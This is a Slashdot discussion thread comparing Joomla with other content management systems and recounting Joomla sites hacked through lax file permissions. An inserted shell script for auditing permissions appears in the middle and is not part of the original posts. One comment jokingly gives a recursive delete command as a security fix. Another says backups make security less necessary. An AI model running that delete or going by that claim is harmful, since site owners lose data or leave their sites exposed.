The one minus for Drupal is that for a small site it tends to be rather heavyweight, with a lot of database requests and modules that make it a bit slow. When on decent hardware, however, it's quite snappy, and Drupal scales up very well.

Re:Ok Joomla fans, sell me (1)

drinkypoo (153816) | more than 5 years ago | (#26968589)

The big minus for Drupal is upgrades. It's easy to get comfortable with a series of modules, then have the developers abandon them and have to seek a replacement when a major Drupal revision hits. And the next Drupal revision is a doozy, it's going to make changes that make the D5 to D6 transition look like a point release. I think Drupal is fantastic but I would be hard-pressed to recommend it to anyone until a little while after the release of D7.

Re:Ok Joomla fans, sell me (1)

FishWithAHammer (957772) | more than 5 years ago | (#26970585)

Depends on the website, though. I mean, D6 will be supported for quite a long time anyway, and some modules just may never upgrade to D7 because of the enormity of it.

Drupal's upgradability from module version to module version, though, really kind of sucks. Manual administration in 2009? Untarring the damn files by hand? What the hell?

Re:Ok Joomla fans, sell me (1)

Slorv (841945) | more than 5 years ago | (#26961939)

We have some 50+ Joomla sites set up for all kind of groups from student projects and research documentation to plain courses in web design for testing.

The framework works great for our needs. I can't think of anything we haven't been able to do, either function-wise or design-wise. But yeah, the very square section/categories thing is the first we skip.

The only immediate negative thing I can think of is the stubborn use of tables even in the smallest of modules. That makes details in your design pretty locked down. Also because of this many Joomla sites will look the same.

We use mod_placehere [diebesteallerzeiten.de] by Eike Pierstorff extensively, since with it we can have multiple content areas active through the sites. Very useful.

If you know only the smallest amount of PHP and CSS, making your own template is very easy.

I've been through most other open CMSes as well, Drupal, Typo3, all of those. But we tend to return to Joomla as soon as we just want the pages up.

Sadly many old-style one-HTML-file-per-page people seem to have a hard time getting the concept of CMSes, though that has nothing to do with Joomla per se.

There are a number of free (as in beer) and commercial addons. The commercial ones are not always the best. So if you have special needs browsing around usually pays off.

Good luck!

Re:Ok Joomla fans, sell me (1)

AlXtreme (223728) | more than 5 years ago | (#26963451)

The site will be almost entirely content. It will need to be updated by non-technical staff, specifically uploading PDFs, creating new pages, and applying tags from multiple fixed taxonomies. It will need to handle user accounts and control editing permissions down to the page level. We do our own design so theming should be too hard, and the more flexible in content placement the better.

I'd go for either Drupal or MODx. Personally I find the latter is much better at large sites (I've done deployments with 10000+ pages and it's still very usable, both speed-wise and usability).

For small sites, Wordpress is fine. For large sites, MODx is great (given you need to invest some time to set it all up). For web apps or sites that have requirements beyond your typical CMS, I tend to go with Django.

Joomla? Not if I have anything to say about it.

Re:Ok Joomla fans, sell me (1)

specific_pacific (904746) | more than 5 years ago | (#26963847)

The 'multiple category' thing Joomla can't do without an additional component (paid - jACL or Juga or something). The rest it can - called DocMan. It can integrate with this ACL sublayer and Joomla will read it as well. So you will have to go with Drupal if you don't want to pay, and install about 10 modules to get the same functionality including a WYSIWYG editor and media control.

You'll then spend more time theming the admin interface, setting up those 10 components to work with roles and worrying about where your files are going which might all seem intuitive at the time but then you realise you've wasted 4 days versus the cost of a couple of components with Joomla.

Re:Ok Joomla fans, sell me (1)

micheas (231635) | more than 5 years ago | (#26967089)

The site will be almost entirely content. It will need to be updated by non-technical staff, specifically uploading PDFs, creating new pages, and applying tags from multiple fixed taxonomies. It will need to handle user accounts and control editing permissions down to the page level. We do our own design so theming should be too hard, and the more flexible in content placement the better.

Thanks in advance.

As a big Joomla! fan I would not recommend you use Joomla unless you are planning on checking out 1.6 from subversion.

Plone has the highest learning curve of Drupal, Joomla!, and Plone, but it requires no tweaking to get what you need.

Plone does all of those things out of the box.

Because Plone uses Zope instead of MySQL, your PDFs will be objects that can have attributes: http://www.example.com/mypdf.pdf [example.com] can have the attribute http://www.example.com/mypdf.pdf/copyright.html [example.com].

Skinning Plone is harder than Joomla and Drupal but spending the extra time skinning it so you can use a CMS that exactly solves your problem with no coding or extensions is what I would strongly recommend.

Double check your security settings... (3, Interesting)

creimer (824291) | more than 5 years ago | (#26960937)

I found out the hard way [creimer.ws] when I did a half-assed job at setting up Joomla! and not updating to the latest security patches. My website got redirected to a Russian website and the password to the database was scrambled. Had to redo everything. Make sure you enable FTP security, have a complex password for your admin/ftp/database accounts, and check your file permissions. Haven't had a problem since then.

Re:Double check your security settings... (1)

bmd256 (1484893) | more than 5 years ago | (#26961127)

If you did not half-ass setting up Joomla!, I am sure the problems you had would not have happened in the first place. When setting up a site with Joomla! or any CMS for that matter, security should be one of your primary concerns.

Re:Double check your security settings... (1)

creimer (824291) | more than 5 years ago | (#26961331)

My rationale at the time was... I'll come back to this shortly because I don't understand how this works and don't have the time to figure this out now. Ten months later my website got hacked. AFAIK, there's no "Joomla! For Dummies" out yet.

Re:Double check your security settings... (1)

cenc (1310167) | more than 5 years ago | (#26963161)

Yeah, I saw a novice account holder on one of my servers make the same permissions mistake and get hacked by the Russians. I run several dozen domains with Joomla myself, both old and new versions, without a problem for years.

Basic web site security 101 rules will keep it safe, even when security bugs appear.

The nature of the structure of modules really does not lend itself to auto updates, however. I can not really say the same thing for phpBB either, or many other CMS-like web systems.

They are too easy for newbies to the web to install, but not easy for them to update and maintain. There should be one-click security patches.
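The two posts above (creimer's "check your file permissions" and cenc's "same permissions mistake") describe the problem but not how to look for it. The script below is an added example, not code from the thread or from the Joomla project: a read-only permissions audit for a Joomla-style document root, followed by the minimal fix, run against a deliberately sloppy sample tree that the script constructs itself. `configuration.php` is Joomla's real settings file (it holds the database password); the modes used for the sample and for the fix, and the assumption that the web server reads files through the owning group, are illustrative choices, not Joomla's official recommendations.

```shell
#!/bin/sh
# Added example (not from the thread or from Joomla): audit a Joomla-style
# docroot for the permission mistakes the thread blames for defacements,
# then apply the minimal fix. Sample tree and modes are constructed here.

# audit_perms DOCROOT: print one finding per line (prints nothing if clean).
audit_perms() {
    root="$1"
    # Anything writable by "other" can be modified by any local account or by
    # a compromised add-on running as another user. A redirected site and a
    # scrambled DB password, as described above, start with a writable file.
    find "$root" ! -type l -perm -002 | sed 's/^/WORLD-WRITABLE: /'

    cfg="$root/configuration.php"
    if [ ! -f "$cfg" ]; then
        echo "MISSING: $cfg"
    elif [ -n "$(find "$cfg" -perm -004)" ]; then
        # Public PHP sources may be world-readable; the one file holding the
        # database credentials should not be.
        echo "WORLD-READABLE: $cfg"
    fi
}

# count_findings DOCROOT: number of audit lines, handy for a cron check.
count_findings() {
    audit_perms "$1" | wc -l | tr -d ' '
}

# fix_perms DOCROOT: drop "other" write everywhere and lock down the config.
# Assumes the web server can read the config through the owning group.
fix_perms() {
    root="$1"
    chmod -R o-w "$root"
    [ -f "$root/configuration.php" ] && chmod 640 "$root/configuration.php"
    return 0
}

# make_sample DIR: build a constructed, deliberately sloppy install to audit.
make_sample() {
    d="$1"
    mkdir -p "$d/administrator" "$d/images" "$d/tmp"
    printf '<?php $mysql_pw = "constructed-example";\n' > "$d/configuration.php"
    printf '<?php echo "hi";\n' > "$d/index.php"
    : > "$d/tmp/cache.txt"
    chmod 755 "$d" "$d/administrator" "$d/tmp"
    chmod 777 "$d/images"              # finding: world-writable directory
    chmod 666 "$d/tmp/cache.txt"       # finding: world-writable file
    chmod 644 "$d/configuration.php"   # finding: credentials world-readable
    chmod 644 "$d/index.php"           # fine: public code, not writable by other
}

# Stand-alone demo: three findings before the fix, none after.
demo=$(mktemp -d)
make_sample "$demo/site"
audit_perms "$demo/site"
echo "findings before: $(count_findings "$demo/site")"
fix_perms "$demo/site"
echo "findings after:  $(count_findings "$demo/site")"
rm -rf "$demo"
```

Pointing `audit_perms` at a real docroot is safe (it only reads); `fix_perms` changes modes, so run the audit first and confirm the web server user still has the access it needs before applying it. The check deliberately ignores who owns the files, because a setup where the FTP user and the web server user share a group, which is what creimer's "enable FTP security" hints at, varies too much between hosts to script generically.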

Re:Double check your security settings... (0)

Anonymous Coward | more than 5 years ago | (#27006211)

hey, creimer! still fat?

ANOTHER Joomla book review? (3, Insightful)

snarfies (115214) | more than 5 years ago | (#26961067)

This [slashdot.org] is [slashdot.org] the [slashdot.org] fifth [slashdot.org] Joomla book review in the past year. How many do we need? What is the hard-on Slashdot has for Joomla, seriously?

Re:ANOTHER Joomla book review? (1)

HartDev (1155203) | more than 5 years ago | (#26962205)

Joomla! is a pretty rocking little CMS you got to admit.

Re:ANOTHER Joomla book review? (1, Insightful)

Anonymous Coward | more than 5 years ago | (#26962589)

Yes and Windows ME was a pretty rocking little OS you gotta admit. If you don't know what the fuck you are talking about, that is.

Re:ANOTHER Joomla book review? (2, Insightful)

Anonymous Coward | more than 5 years ago | (#26962229)

Hell, I welcome Joomla news. Joomla is how I make my living. I don't bitch about the fact there is some stupid article about the iPhone every other day.

Re:ANOTHER Joomla book review? (1, Informative)

Anonymous Coward | more than 5 years ago | (#26963091)

I can understand getting upset over a lack of reviews on a certain topic. But getting upset that Joomla books get reviewed every so often?

You not only took the time to come here but also took the time to comment! Just skip it.

I like Joomla! and have bought a few books that got reviewed here. I haven't decided on this one yet but my initial reaction is to pass.

Re:ANOTHER Joomla book review? (2, Informative)

DiegoBravo (324012) | more than 5 years ago | (#26963775)

> What is the hard-on Slashdot has for Joomla, seriously?

The simpler explanation is that a lot of /. readers are using or administering Joomla. Count me too.

Instead of complaining, please write some review on another (interesting) topic.

Re:ANOTHER Joomla book review? (1)

Spy Handler (822350) | more than 5 years ago | (#26966105)

because joomla is the most popular web cms?

Linux isn't the most popular computer OS, not even close, yet Slashdot has a huge hard-on for it, and I don't see many complaints. So how about a nice cup of STFU for you?

One false sense of security coming up (1)

tsalmark (1265778) | more than 5 years ago | (#26961547)

So now some, presumably competent, writer can paint by numbers, and have no idea when they make a fatal security mistake. Nice

Automated scans... (1)

msimm (580077) | more than 5 years ago | (#26962101)

While I personally feel meh towards kitchen-sink-style CMSes, it's probably worth mentioning directory and/or file renaming, because sooner or later those morons that run automated scanners will exploit a vulnerability that will affect you.

Name shenanigans (1)

Neuticle (255200) | more than 5 years ago | (#26964421)

While I'm not a fan of punctuation-included-names, since Joomla discussions seem to inevitably bring up the name, I'll say this: "!" aside, Joomla is actually a pretty clever name for a CMS. Joomla being a re-spelling of the Swahili (and probably other Bantu languages) word Jumla, which can mean altogether, as a whole etc.

Ubuntu, while not Swahili per se, is another Bantu word. I'm sure there are other OSS projects out there that have used the same tactic. It's a neat way to have meaning in a word that at the same time is completely unfamiliar to almost all people in Asia, Europe and the Americas.

Joomla security (0)

Anonymous Coward | more than 5 years ago | (#26965199)

I have a trick for making joomla ultra-secure. After you set up joomla, recursively wget the entire site, put the resulting files in the DocumentRoot and delete Joomla. It's amazing *just* how much more secure that is!

Easy way to secure your Joomla! installation (1)

gravyface (592485) | more than 5 years ago | (#26965369)

rm -rf /var/www/myjoomlasite

The core's not the problem, but the 3rd-party add-ons can hurt you badly.

Check out http://milw0rm.com/ [milw0rm.com] and do a quick search for Joomla and see why.

Re:Easy way to secure your Joomla! installation (1)

Rhaban (987410) | more than 5 years ago | (#26967465)

The core is not the problem, but you can't make a decent site without add-ons.

I work a lot with Joomla, not by choice (I would always choose Drupal or EZpublish over Joomla).

Joomla lacks some essential features such as linking a file to a content, adding a new field to a content type, managing several content types, managing access levels, user groups, etc...

This is why I always write the add-ons I need myself. I made some kind of framework (outside Joomla's, because the Joomla framework is a piece of shit), with a simple yet solid structure, that I can use to easily do 95% of what I'll ever need, and I extend it whenever I need to.
My last Joomla sites use core Joomla features only for user management and authentication, and my own add-on for everything else. The client is happy because it is Joomla (and his 12 yo nephew told him Joomla is good so it must be true, no matter what a 10-year web developer can say), and I'm happy because I don't really have to deal with the crappy shit Joomla is.

Just produce content, security is no issue. (1)

hamanaka (894048) | more than 5 years ago | (#26967209)

I have been working in Joomla websites since the mambo days. Joomla is an excellent web system and security is very critical. Having a hosting provider is not enough. You need to have a webmaster who can be your web administrator or your guy who has already solved the problem you come across. The books that have been reviewed lately regarding Joomla are excellent ways to break right through steep learning curves. Writing your own extension to start with might be a little complicated. Learning how to manage content and using each type of extension should be initial building blocks. Having low confidence in security is not a problem if you have a continuous backup system. The installation process can be automated or done manually. I am a student for the next 3 months, when summer starts I plan on providing my years of mambo/joomla CMS knowledge to as many people as possible. My goal is to help people become self-reliant CMS operators, who will build applications that many people will use. The demand for application administrators is very high. However, Joomla is only a framework and high quality content still needs to be produced and an evangelist must still bring a strong concept to the website. The security portion of a business plan utilizing the Joomla framework is less necessary if you have the correct infrastructure.